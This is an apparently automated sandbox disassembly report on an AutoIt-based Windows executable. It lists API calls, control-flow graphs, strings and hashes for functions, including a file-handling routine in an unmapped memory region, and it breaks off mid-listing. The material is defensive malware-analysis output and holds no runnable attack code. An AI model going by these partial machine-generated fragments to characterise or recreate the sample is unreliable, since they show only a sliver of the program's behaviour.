                                                  • Opcode ID: 57ec127e0f2c11875a801fa31117e3496c540d35e8d5a9d1d33ce2bcd3069e79
                                                  • Instruction ID: 156abe555a9b804cee5ef2388dcfa3b52e3abc3385540488c4de4a3ccf882abd
                                                  • Opcode Fuzzy Hash: 57ec127e0f2c11875a801fa31117e3496c540d35e8d5a9d1d33ce2bcd3069e79
                                                  • Instruction Fuzzy Hash: 4371BF711083159ED704EF69EC81AAFBBE8FF89310F40466EF545D72A0DB749988CB92
                                                  Function 00BF3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BF3A50
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00BF3A5F
                                                  • LoadIconW.USER32(00000063), ref: 00BF3A76
                                                  • LoadIconW.USER32(000000A4), ref: 00BF3A88
                                                  • LoadIconW.USER32(000000A2), ref: 00BF3A9A
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF3AC0
                                                  • RegisterClassExW.USER32(?), ref: 00BF3B16
                                                    • Part of subcall function 00BF3041: GetSysColorBrush.USER32(0000000F), ref: 00BF3074
                                                    • Part of subcall function 00BF3041: RegisterClassExW.USER32(00000030), ref: 00BF309E
                                                    • Part of subcall function 00BF3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF30AF
                                                    • Part of subcall function 00BF3041: InitCommonControlsEx.COMCTL32(?), ref: 00BF30CC
                                                    • Part of subcall function 00BF3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF30DC
                                                    • Part of subcall function 00BF3041: LoadIconW.USER32(000000A9), ref: 00BF30F2
                                                    • Part of subcall function 00BF3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 710b87851a84c5b45025ae9252555a6302fe32932c45351e91553c8c6bc9c6fb
                                                  • Instruction ID: cd2d7ff92f2acb571cda9a0568c6addc70eb177eaf436f8c0cdc864aeae2b62f
                                                  • Opcode Fuzzy Hash: 710b87851a84c5b45025ae9252555a6302fe32932c45351e91553c8c6bc9c6fb
                                                  • Instruction Fuzzy Hash: AC214671D02308AFEB15DFA4EC49BAD7BF0FB08711F00426AF604AB2A1D7B55A548F85
                                                  Function 00BF3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 767 bf3633-bf3681 769 bf3683-bf3686 767->769 770 bf36e1-bf36e3 767->770 771 bf3688-bf368f 769->771 772 bf36e7 769->772 770->769 773 bf36e5 770->773 777 bf374b-bf3753 PostQuitMessage 771->777 778 bf3695-bf369a 771->778 775 bf36ed-bf36f0 772->775 776 c2d0cc-c2d0fa call c01070 call c01093 772->776 774 bf36ca-bf36d2 DefWindowProcW 773->774 785 bf36d8-bf36de 774->785 779 bf3715-bf373c SetTimer RegisterWindowMessageW 775->779 780 bf36f2-bf36f3 775->780 814 c2d0ff-c2d106 776->814 784 bf3711-bf3713 777->784 782 c2d154-c2d168 call c52527 778->782 783 bf36a0-bf36a2 778->783 779->784 789 bf373e-bf3749 CreatePopupMenu 779->789 786 bf36f9-bf370c KillTimer call bf443a call bf3114 780->786 787 c2d06f-c2d072 780->787 782->784 808 c2d16e 782->808 790 bf36a8-bf36ad 783->790 791 bf3755-bf3764 call bf44a0 783->791 784->785 786->784 799 c2d074-c2d076 787->799 800 c2d0a8-c2d0c7 MoveWindow 787->800 789->784 795 c2d139-c2d140 790->795 796 bf36b3-bf36b8 790->796 791->784 795->774 804 c2d146-c2d14f call c47c36 795->804 806 bf36be-bf36c4 796->806 807 c2d124-c2d134 call c52d36 796->807 801 c2d097-c2d0a3 SetFocus 799->801 802 c2d078-c2d07b 799->802 800->784 801->784 802->806 810 c2d081-c2d092 call c01070 802->810 804->774 806->774 806->814 807->784 808->774 810->784 814->774 818 c2d10c-c2d11f call bf443a call bf434a 814->818 818->774
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00BF36D2
                                                  • KillTimer.USER32(?,00000001), ref: 00BF36FC
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BF371F
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF372A
                                                  • CreatePopupMenu.USER32 ref: 00BF373E
                                                  • PostQuitMessage.USER32(00000000), ref: 00BF374D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: 8cb48ec89a9467a6d4382581c445f6698433b535d3bb243e050e3dddf18f1997
                                                  • Instruction ID: 4dd825b624810db162051562242d63fcb44f7db73c29a94f21779e22a117926f
                                                  • Opcode Fuzzy Hash: 8cb48ec89a9467a6d4382581c445f6698433b535d3bb243e050e3dddf18f1997
                                                  • Instruction Fuzzy Hash: A44132B220450DBBDB146F64EC89BBE36D4EB00B01F140269FB02D72E1CA619E899762
                                                  Function 00BF3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                  • API String ID: 1825951767-3513169116
                                                  • Opcode ID: 10ad7590b94fcc6afdd74649e53dc4a23ded11d3d4ae0798f97d19bbff349464
                                                  • Instruction ID: ba35852d5cbf2d6443f7c856f1d30c24594d6ea27c9c7dadf996259f4f322e2b
                                                  • Opcode Fuzzy Hash: 10ad7590b94fcc6afdd74649e53dc4a23ded11d3d4ae0798f97d19bbff349464
                                                  • Instruction Fuzzy Hash: 3EA15A7290022D9ACF04EBA4DC91AFEB7F8BF15710F4005A9E616B7191EF745A0DCB61
                                                  Function 02280920 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1009 2280920-2280972 call 2280820 CreateFileW 1012 228097b-2280988 1009->1012 1013 2280974-2280976 1009->1013 1016 228098a-2280996 1012->1016 1017 228099b-22809b2 VirtualAlloc 1012->1017 1014 2280ad4-2280ad8 1013->1014 1016->1014 1018 22809bb-22809e1 CreateFileW 1017->1018 1019 22809b4-22809b6 1017->1019 1021 22809e3-2280a00 1018->1021 1022 2280a05-2280a1f ReadFile 1018->1022 1019->1014 1021->1014 1023 2280a21-2280a3e 1022->1023 1024 2280a43-2280a47 1022->1024 1023->1014 1025 2280a68-2280a7f WriteFile 1024->1025 1026 2280a49-2280a66 1024->1026 1028 2280aaa-2280acf CloseHandle VirtualFree 1025->1028 1029 2280a81-2280aa8 1025->1029 1026->1014 1028->1014 1029->1014
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02280965
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                  • Instruction ID: 50410712166cd7406cf76cb1cf5f2288b135373cfd31b7131efe66a79351cdc7
                                                  • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                  • Instruction Fuzzy Hash: C651E976A61209FBEB60DFE4CC49FDE7778AF48701F108554FA19AA1C0DA74A644CB60
                                                  Function 00BF39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1049 bf39d5-bf3a45 CreateWindowExW * 2 ShowWindow * 2
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF3A03
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF3A24
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00BF3A38
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00BF3A41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: fad5d9fa130d61b71989305f3c150cb840a20610172a448ff6ba024c68aed7fd
                                                  • Instruction ID: e2cc3f16e794300a743a03e00cd6d5d1f2665bc626cb12c44f64f3af2ea082bb
                                                  • Opcode Fuzzy Hash: fad5d9fa130d61b71989305f3c150cb840a20610172a448ff6ba024c68aed7fd
                                                  • Instruction Fuzzy Hash: 3BF0DA755426907EEA3157276C49F6F3E7DD7C6F50F01422EB904A2270C6611851DAB1
                                                  Function 00BF407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1050 bf407c-bf4092 1051 bf416f-bf4173 1050->1051 1052 bf4098-bf40ad call bf7a16 1050->1052 1055 c2d3c8-c2d3d7 LoadStringW 1052->1055 1056 bf40b3-bf40d3 call bf7bcc 1052->1056 1058 c2d3e2-c2d3fa call bf7b2e call bf6fe3 1055->1058 1056->1058 1061 bf40d9-bf40dd 1056->1061 1068 bf40ed-bf416a call c12de0 call bf454e call c12dbc Shell_NotifyIconW call bf5904 1058->1068 1072 c2d400-c2d41e call bf7cab call bf6fe3 call bf7cab 1058->1072 1062 bf4174-bf417d call bf8047 1061->1062 1063 bf40e3-bf40e8 call bf7b2e 1061->1063 1062->1068 1063->1068 1068->1051 1072->1068
                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C2D3D7
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • _memset.LIBCMT ref: 00BF40FC
                                                  • _wcscpy.LIBCMT ref: 00BF4150
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BF4160
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                  • String ID: Line:
                                                  • API String ID: 3942752672-1585850449
                                                  • Opcode ID: 79180e11c8e8f6c87853bc9b55a02295feb80c652b878053ee2dff8d984a02f8
                                                  • Instruction ID: c4fa5c76fc72e55736f85dbf8693a035cea9112afbf504e2bbb6c68fec63002f
                                                  • Opcode Fuzzy Hash: 79180e11c8e8f6c87853bc9b55a02295feb80c652b878053ee2dff8d984a02f8
                                                  • Instruction Fuzzy Hash: CC318D71009709ABD321EB60EC46BEB77E8AF54304F104A9EF685930A1EF70964CCB93
                                                  Function 00C1541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1085 c1541d-c15436 1086 c15453 1085->1086 1087 c15438-c1543d 1085->1087 1088 c15455-c1545b 1086->1088 1087->1086 1089 c1543f-c15441 1087->1089 1090 c15443-c15448 call c18b28 1089->1090 1091 c1545c-c15461 1089->1091 1103 c1544e call c18db6 1090->1103 1092 c15463-c1546d 1091->1092 1093 c1546f-c15473 1091->1093 1092->1093 1095 c15493-c154a2 1092->1095 1096 c15483-c15485 1093->1096 1097 c15475-c15480 call c12de0 1093->1097 1101 c154a4-c154a7 1095->1101 1102 c154a9 1095->1102 1096->1090 1100 c15487-c15491 1096->1100 1097->1096 1100->1090 1100->1095 1105 c154ae-c154b3 1101->1105 1102->1105 1103->1086 1107 c154b9-c154c0 1105->1107 1108 c1559c-c1559f 1105->1108 1109 c15501-c15503 1107->1109 1110 c154c2-c154ca 1107->1110 1108->1088 1112 c15505-c15507 1109->1112 1113 c1556d-c1556e call c20ba7 1109->1113 1110->1109 1111 c154cc 1110->1111 1114 c154d2-c154d4 1111->1114 1115 c155ca 1111->1115 1116 c15509-c15511 1112->1116 1117 c1552b-c15536 1112->1117 1124 c15573-c15577 1113->1124 1119 c154d6-c154d8 1114->1119 1120 c154db-c154e0 1114->1120 1121 c155ce-c155d7 1115->1121 1122 c15521-c15525 1116->1122 1123 c15513-c1551f 1116->1123 1125 c15538 1117->1125 1126 c1553a-c1553d 1117->1126 1119->1120 1127 c155a4-c155a8 1120->1127 1129 c154e6-c154ff call c20cc8 1120->1129 1121->1088 1130 c15527-c15529 1122->1130 1123->1130 1124->1121 1131 c15579-c1557e 1124->1131 1125->1126 1126->1127 1128 c1553f-c1554b call c146e6 call c20e5b 1126->1128 1132 c155ba-c155c5 call c18b28 1127->1132 1133 c155aa-c155b7 call c12de0 1127->1133 1146 c15550-c15555 1128->1146 1145 c15562-c1556b 1129->1145 1130->1126 1131->1127 1136 c15580-c15591 1131->1136 1132->1103 1133->1132 1141 c15594-c15596 1136->1141 1141->1107 1141->1108 1145->1141 1147 c1555b-c1555e 1146->1147 1148 c155dc-c155e0 1146->1148 1147->1115 1149 c15560 1147->1149 1148->1121 1149->1145
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                  • Instruction ID: 4d2d579a7bc37a0fd32f2fab8fb369515298d16e221f901cf368913b0fe61c59
                                                  • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                  • Instruction Fuzzy Hash: EE51A570A00B05DBDB249F69D8806EE77A7AF82321F248729F835962D1D7709ED1BB41
                                                  Function 00BF686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1150 bf686a-bf6891 call bf4ddd 1153 c2e031-c2e041 call c5955b 1150->1153 1154 bf6897-bf68a5 call bf4ddd 1150->1154 1157 c2e046-c2e048 1153->1157 1154->1153 1159 bf68ab-bf68b1 1154->1159 1160 c2e067-c2e0af call c10db6 1157->1160 1161 c2e04a-c2e04d call bf4e4a 1157->1161 1162 c2e052-c2e061 call c542f8 1159->1162 1163 bf68b7-bf68d9 call bf6a8c 1159->1163 1169 c2e0b1-c2e0bb 1160->1169 1170 c2e0d4 1160->1170 1161->1162 1162->1160 1173 c2e0cf-c2e0d0 1169->1173 1174 c2e0d6-c2e0e9 1170->1174 1175 c2e0d2 1173->1175 1176 c2e0bd-c2e0cc 1173->1176 1177 c2e260-c2e271 call c12d55 call bf4e4a 1174->1177 1178 c2e0ef 1174->1178 1175->1174 1176->1173 1187 c2e273-c2e283 call bf7616 call bf5d9b 1177->1187 1180 c2e0f6-c2e0f9 call bf7480 1178->1180 1184 c2e0fe-c2e120 call bf5db2 call c573e9 1180->1184 1194 c2e122-c2e12f 1184->1194 1195 c2e134-c2e13e call c573d3 1184->1195 1203 c2e288-c2e2b8 call c4f7a1 call c10e2c call c12d55 call bf4e4a 1187->1203 1198 c2e227-c2e237 call bf750f 1194->1198 1201 c2e140-c2e153 1195->1201 1202 c2e158-c2e162 call c573bd 1195->1202 1198->1184 1207 c2e23d-c2e25a call bf735d 1198->1207 1201->1198 1212 c2e176-c2e180 call bf5e2a 1202->1212 1213 c2e164-c2e171 1202->1213 1203->1187 1207->1177 1207->1180 1212->1198 1220 c2e186-c2e19e call c4f73d 1212->1220 1213->1198 1225 c2e1a0-c2e1bf call bf7de1 call bf5904 1220->1225 1226 c2e1c1-c2e1c4 1220->1226 1249 c2e1e2-c2e1f0 call bf5db2 1225->1249 1227 c2e1f2-c2e1f5 1226->1227 1228 c2e1c6-c2e1e1 call bf7de1 call bf6839 call bf5904 1226->1228 1230 c2e1f7-c2e200 call c4f65e 1227->1230 1231 c2e215-c2e218 call c5737f 1227->1231 1228->1249 1230->1203 1242 c2e206-c2e210 call c10e2c 1230->1242 1239 c2e21d-c2e226 call c10e2c 1231->1239 1239->1198 1242->1184 1249->1239
                                                  APIs
                                                    • Part of subcall function 00BF4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BF4E0F
                                                  • _free.LIBCMT ref: 00C2E263
                                                  • _free.LIBCMT ref: 00C2E2AA
                                                    • Part of subcall function 00BF6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BF6BAD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                  • API String ID: 2861923089-1757145024
                                                  • Opcode ID: d0810c5441b92eece7be953dbb31d827b021adf23385c0360275c0cdcf3926ae
                                                  • Instruction ID: e8f232d8970271e90d1627c0d700057b9e76de71d59d1b421bf8c0904360f8bd
                                                  • Opcode Fuzzy Hash: d0810c5441b92eece7be953dbb31d827b021adf23385c0360275c0cdcf3926ae
                                                  • Instruction Fuzzy Hash: B6916E7190022DEFCF14EFA4DC819EDB7B8FF05310B10446AF916AB2A1DB709A59DB50
                                                  Function 022823E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 022822D0: Sleep.KERNELBASE(000001F4), ref: 022822E1
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0228251D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: K8964UA2SM5T5L
                                                  • API String ID: 2694422964-325841267
                                                  • Opcode ID: 98900f42fa93481124b8abb243843155ebc5cf799ce877e861247058f6467cc2
                                                  • Instruction ID: 4fc7f77648eabbd416ea146c3581f7e696083f7b38d4e61655b9d5ad957c6d3e
                                                  • Opcode Fuzzy Hash: 98900f42fa93481124b8abb243843155ebc5cf799ce877e861247058f6467cc2
                                                  • Instruction Fuzzy Hash: 3F516F30D15248DAEF15EBE4C864BEEB779AF18300F004599E609BB2C0DBB95B45CBA5
                                                  Function 00BF35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00BF35A1,SwapMouseButtons,00000004,?), ref: 00BF35D4
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00BF35A1,SwapMouseButtons,00000004,?,?,?,?,00BF2754), ref: 00BF35F5
                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00BF35A1,SwapMouseButtons,00000004,?,?,?,?,00BF2754), ref: 00BF3617
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: d8eec4674789ae6ee0c518b2b0cac56b44438b1ea69e44edea5c491ffdf788cc
                                                  • Instruction ID: ce563c370cf8aa99b0db6c030a9042b049ab45932b2a11570422663e21fb88d3
                                                  • Opcode Fuzzy Hash: d8eec4674789ae6ee0c518b2b0cac56b44438b1ea69e44edea5c491ffdf788cc
                                                  • Instruction Fuzzy Hash: 5711457161420CBFDF208F64DC80ABEBBF8EF04B40F0084A9E909D7210E2719E499BA0
                                                  Function 00C1470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                  • Instruction ID: 862c005e6dd0d4c89fa5ca20690ae86d3492284a26dd8062f5c4adeb03e3c83c
                                                  • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                  • Instruction Fuzzy Hash: 16419475A007459BEB1CCE69C8809EA77A6AF47364B24853DE825C76C0DB70DEC1EB90
                                                  Function 00BF7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C2EA39
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00C2EA83
                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                    • Part of subcall function 00C10791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C107B0
